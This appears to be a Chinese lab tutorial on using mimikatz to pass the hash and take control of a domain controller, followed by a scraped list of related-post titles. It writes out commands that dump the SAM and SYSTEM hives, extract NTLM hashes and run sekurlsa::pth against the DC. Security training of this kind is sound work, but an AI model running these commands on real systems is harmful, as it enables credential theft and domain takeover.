mimikatz hash传递–获取域控权限

实验环境

实验环境:win_server2012 ip:192.168.3.132 (域内普通用户,有本地管理员权限,但不知明文密码)
win_server2008 ip:192.168.3.133 (DC域控,与server2012管理员密码相同,但不知明文密码)
此时,你已经拿下了域内一普通用户win_server2012

实验步骤

1,将mimikatz上传至win_server2012;
2,cd 至mimikatz目录;
3,使用reg命令,将注册表中HKLM下的 SAM与 SYSTEM键值导出保存至 sam.hive和 system.hive

reg save hklm\sam sam.hive
reg save hklm\system system.hive

4,使用mimikatz读取 .hive 注册表文件,以获取本地用户的NTLM hash值;

.\mimikatz "lsadump::sam /system:system.hive /sam:sam.hive" exit

5,使用mimikatz进行hash传递攻击:

.\mimikatz
sekurlsa:pth /user:目标机器用户名 /domain:目标机器IP /ntlm:本地获取的NTLM hash值
例如:sekurlsa::pth /user:administrator /domain:192.168.3.133 /ntlm:afff........

6,攻击成功后,会弹出一个cmd.exe,此时,可以去win2008(DC)的C盘创建一个1.txt,内容为hello world,
回到win2012,进行验证:

1,读取win2008的 C盘以及1.txt内容,注意读取方式
dir \\192.168.3.133\C$
type \\192.168.3.133\C$\1.txt

mimikatz hash传递--获取域控权限相关推荐

  1. 黄金票据维持域控权限

    黄金票据维持域控权限 实验环境:windows2012域控.windows2012域内主机 实验要求:利用黄金票据维持域控权限 详细步骤: 1.首先搭建相关的域环境 a:设置服务器 b:更改计算机名称 ...

  2. 权限维持之:SID History 域控权限维持

    权限维持之:SID History 域控权限维持 1 SID 作用 2 利用 SID History 操作过程 3 SID History 权限维持的防御 1 SID 作用 ​ 每个用户都有自己的SI ...

  3. 域控服务器排查命令,mimikatz利用zerologon攻击域控服务器相关命令(附蓝队自查方案)...

    0x01 前言 mimikatz 20200918版本支持通过zerologon漏洞攻击域控服务器.下载链接如下https://github.com/gentilkiwi/mimikatz/relea ...

  4. 牛红红的日记(平平无奇拿下域控)

    牛红红的日记(平平无奇拿下域控) 注:本文首发地址:https://www.sec-in.com 文章作者为-句芒安全实验室-成员之一,欢迎微信搜索关注我们. 一.引文 x年x月x日 晴 我是一只牛, ...

  5. 内网渗透,横向移动总结(mimikatz域控)

    目录 前言 利用windows远程连接命令 ipc连接 at命令 schtasks命令 (在2008及以后的系统中已经将at命令废弃,改用schtasks命令代替了at命令) 利用windows服务 ...

  6. 【Web安全】内网渗透研究之利用MSF和Impacket工具拿域控

    内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 [查看资料] 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路 ...

  7. 内网渗透测试:域内权限维持思路总结

    我的Freebuf:https://www.freebuf.com/author/MrAnonymous 我的博客:https://whoamianony.top/ 文章目录 Windows 操作系统 ...

  8. 一次完整的从webshell到域控的探索之路

    前言 内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里. 于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求. 今天小菜我本着所有师傅们无私分享的精 ...

  9. Windows 内网渗透之攻击域控

    文章目录 内网渗透之攻击域控 前言 高权限读取本地密码 procdump+mimikatz绕过杀软 SYSVOL组策略获取密码 Kerberoasting 暴力破解密码 原理 使用setspn查询sp ...

最新文章

  1. Kafka技术架构那些事儿
  2. NAnt学习笔记(2) -- 节点的含义解释
  3. [转]ExtJS Grid 分页时保持选中的简单实现方法
  4. linux 基本命令学习笔记
  5. idea 编写javafx_用JavaFX编写图块引擎
  6. 爬虫图片href是html图片,xpath爬虫实例,爬取图片网站百度盘地址和提取码
  7. leetcode 480. 滑动窗口中位数(堆+滑动窗口)
  8. TemplatePart用法说明
  9. asp.net下载文件的常用方法大全
  10. HTML特殊字符显示
  11. 行内元素多出的空白文本节点的解决方法
  12. 网络是怎样连接的学习笔记1----探索浏览器内部(十分适合理清思路)
  13. 阿里巴巴 JAVA 开发手册
  14. 【PID优化】基于蝙蝠 粒子群 花卉授粉算法和布谷鸟搜索算法实现热交换器的PI控制器优化
  15. ubuntu安装显卡驱动后无法进入系统
  16. Assimp库中文文档
  17. kaka的使用以及理解
  18. 修改微信小程序单选,复选框样式
  19. iOS app url scheme跳转到淘宝商品详情页 唤醒app
  20. 24点游戏 java实现_java实现24点纸牌游戏

热门文章

  1. 基于matlab数据线性拟合回归
  2. 实习一:6S大气校正
  3. 装机大师无法发现linux硬盘,华硕电脑进PE系统找不到硬盘的解决办法
  4. matlab网页视频流,MATLAB - 捕获视频流(MJPEG,rtsp,mpeg)
  5. (E-R图)实体-联系图(数据模型)
  6. Angelo Cangelosi:发展型机器人先驱,让机器人模仿儿童学习与发展|42问AI与机器人未来...
  7. 电脑上不了网了......
  8. hadoop分布式数据库--佘响平2.1
  9. 太吾绘卷加载不进去_《太吾绘卷》高难度快速读书以及获得门派支持度方法
  10. 更新windows补丁时一直卡在搜索更新